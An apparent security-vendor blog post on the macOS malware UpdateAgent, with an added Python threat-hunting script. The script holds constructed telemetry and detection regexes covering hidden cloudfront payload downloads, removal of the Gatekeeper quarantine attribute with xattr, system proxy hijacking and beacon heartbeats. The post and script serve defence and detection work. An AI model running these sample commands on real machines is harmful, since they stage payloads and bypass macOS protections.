macOS Malware UpdateAgent Grows Increasingly Malicious


UpdateAgent, a macOS malware family, has now been active for roughly 14 months: it first appeared as a rudimentary infostealer around November or December 2020. Since then its operators have kept adding capabilities, and each revision has been more dangerous than the last.

Additional capabilities

  • UpdateAgent now drops Adload, an aggressive second-stage adware payload that installs a persistent backdoor.
  • The adware injects advertisements and promotions into search results and web pages, and it routes the victim's browsing through a web proxy to mount a man-in-the-middle attack. This lets the attackers siphon ad revenue away from the owners of the legitimate websites.
  • Besides sending collected data to the attacker's server, it emits periodic "heartbeats" so the operators know the implant is still alive.
  • During reconnaissance UpdateAgent collects hardware and system-profile data (the output of system_profiler SPHardwareDataType), which includes the serial number of the victim machine.

Why is this significant?

  1. The malware poses as legitimate software, such as help agents or video games, and is distributed through compromised or malicious websites to trick its victims.
  2. It abuses the capabilities of the Mac platform itself: UpdateAgent bypasses Gatekeeper, the control that is meant to ensure only trusted apps are installed and run.
  3. It runs with whatever permissions the current user already has, carries out its actions, and then removes the evidence.
  4. It hosts additional payloads on public cloud infrastructure such as Amazon S3 and CloudFront, where its downloads blend in with legitimate traffic.
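The behaviours listed in the two sections above translate into a handful of host-level indicators a defender can hunt for. What follows is an added example, not code from this article or from the original malware analysis: a small Python triage script run over constructed macOS process-execution telemetry (the log format, host names, paths and user names are invented for the example). The rules encode my own choice of indicators: system_profiler SPHardwareDataType for the hardware reconnaissance named above; removal of the com.apple.quarantine extended attribute with xattr, which is the standard way a downloaded file escapes Gatekeeper's evaluation (the article does not state which technique UpdateAgent uses); curl or wget fetches from cloudfront.net or amazonaws.com hosts for cloud-hosted payload staging; networksetup proxy changes as a sign of proxy-based ad injection; and a command line re-run at a near-constant interval as a heartbeat.

```python
"""Hunt for UpdateAgent-style behaviour in macOS process-execution telemetry.

Added example: the rules map the behaviours described in the article to
command-line indicators. Log format, hosts, paths and users are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime

# Constructed telemetry, one process execution per line:
# "<ISO-8601 UTC timestamp> <user> <command line>". Not real UpdateAgent data.
SAMPLE_LOG = """\
2022-02-03T10:00:01Z alice /usr/sbin/system_profiler SPHardwareDataType
2022-02-03T10:00:02Z alice /usr/bin/curl -s -o /tmp/.upd.zip https://d1xyz.cloudfront.net/upd/latest.zip
2022-02-03T10:00:03Z alice /usr/bin/xattr -r -d com.apple.quarantine /tmp/.upd
2022-02-03T10:00:04Z alice /usr/sbin/networksetup -setwebproxy Wi-Fi 127.0.0.1 8080
2022-02-03T10:00:05Z alice /usr/bin/grep -r com.apple.quarantine /tmp/notes.txt
2022-02-03T10:05:00Z alice /usr/bin/curl -s https://updates.example-cdn.net/hb
2022-02-03T10:10:00Z alice /usr/bin/curl -s https://updates.example-cdn.net/hb
2022-02-03T10:15:00Z alice /usr/bin/curl -s https://updates.example-cdn.net/hb
2022-02-03T10:20:00Z alice /usr/bin/curl -s https://updates.example-cdn.net/hb
2022-02-03T11:00:00Z bob /usr/bin/curl -s https://example.com/
"""

# (indicator name, regex over the command line). The indicator choices are mine.
RULES = [
    # Hardware reconnaissance: the system_profiler data type the article names,
    # whose output includes the machine serial number.
    ("hardware_recon", re.compile(r"\bsystem_profiler\b.*\bSPHardwareDataType\b")),
    # Gatekeeper evaluates downloads that carry the com.apple.quarantine xattr;
    # stripping it (xattr -d, possibly combined with -r) is the usual bypass.
    ("quarantine_removal",
     re.compile(r"\bxattr\b(?=.*\s-[a-z]*d[a-z]*\b)(?=.*com\.apple\.quarantine)")),
    # Second-stage payload pulled from public AWS infrastructure.
    ("cloud_payload_fetch",
     re.compile(r"\b(?:curl|wget)\b.*https?://[^\s/]*(?:cloudfront\.net|amazonaws\.com)")),
    # System web proxy changed: how a proxy-based ad injector inserts itself.
    ("proxy_tamper", re.compile(r"\bnetworksetup\b.*\s-set(?:web|secureweb|auto)proxy")),
]


def parse_log(text):
    """Turn the constructed log text into a list of event dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, user, cmd = line.split(" ", 2)
        events.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                       "user": user, "cmd": cmd})
    return events


def match_rules(events):
    """Return (indicator, user, command line) for every rule hit."""
    hits = []
    for ev in events:
        for name, rx in RULES:
            if rx.search(ev["cmd"]):
                hits.append((name, ev["user"], ev["cmd"]))
    return hits


def find_heartbeats(events, min_repeats=3, jitter=0.25):
    """Flag command lines re-run at a near-constant interval (beaconing).

    Returns {(user, cmd): mean interval in seconds} for every command line
    seen at least min_repeats+1 times whose gaps all sit within +/-jitter of
    the mean gap.
    """
    by_key = defaultdict(list)
    for ev in events:
        by_key[(ev["user"], ev["cmd"])].append(ev["ts"])
    beacons = {}
    for key, stamps in by_key.items():
        if len(stamps) < min_repeats + 1:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = sum(gaps) / len(gaps)
        if mean > 0 and all(abs(g - mean) <= jitter * mean for g in gaps):
            beacons[key] = mean
    return beacons


def triage(text):
    """Group indicator names per user; users with no hits are omitted."""
    events = parse_log(text)
    indicators = defaultdict(set)
    for name, user, _cmd in match_rules(events):
        indicators[user].add(name)
    for (user, _cmd), _interval in find_heartbeats(events).items():
        indicators[user].add("heartbeat_beacon")
    return {user: sorted(names) for user, names in indicators.items()}


if __name__ == "__main__":
    for user, names in triage(SAMPLE_LOG).items():
        print(f"{user}: {', '.join(names)}")
```

Run it with no arguments to triage the embedded sample; in practice the events would come from an EDR or the unified log. Each rule on its own is noisy (administrators run system_profiler, and plenty of legitimate software sits behind CloudFront), so the output groups indicators per user and the interesting signal is several of them landing on the same account within minutes, as they do for the constructed user alice and not for bob.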

Last But Not Least

Modern work environments rely on a mix of devices and operating systems, so organizations need defensive coverage across all of them, and UpdateAgent's evolution underlines the point. Its authors have turned a simple data stealer into a complex, persistent and aggressive threat.

By IEMA IEMLabs

IEMLabs is an ISO 27001:2013 and ISO 9001:2015 certified company and a member of EC-Council, NASSCOM, the Data Security Council of India (DSCI), the Indian Chamber of Commerce (ICC), the U.S. Chamber of Commerce, and the Confederation of Indian Industry (CII). The company was established in 2016 with the vision of providing cyber security to the digital world and making it hack proof. Why is cyber security suddenly so much in discussion? As technology develops, more and more companies are moving their business into the digital world, and cybercrime is growing with it.
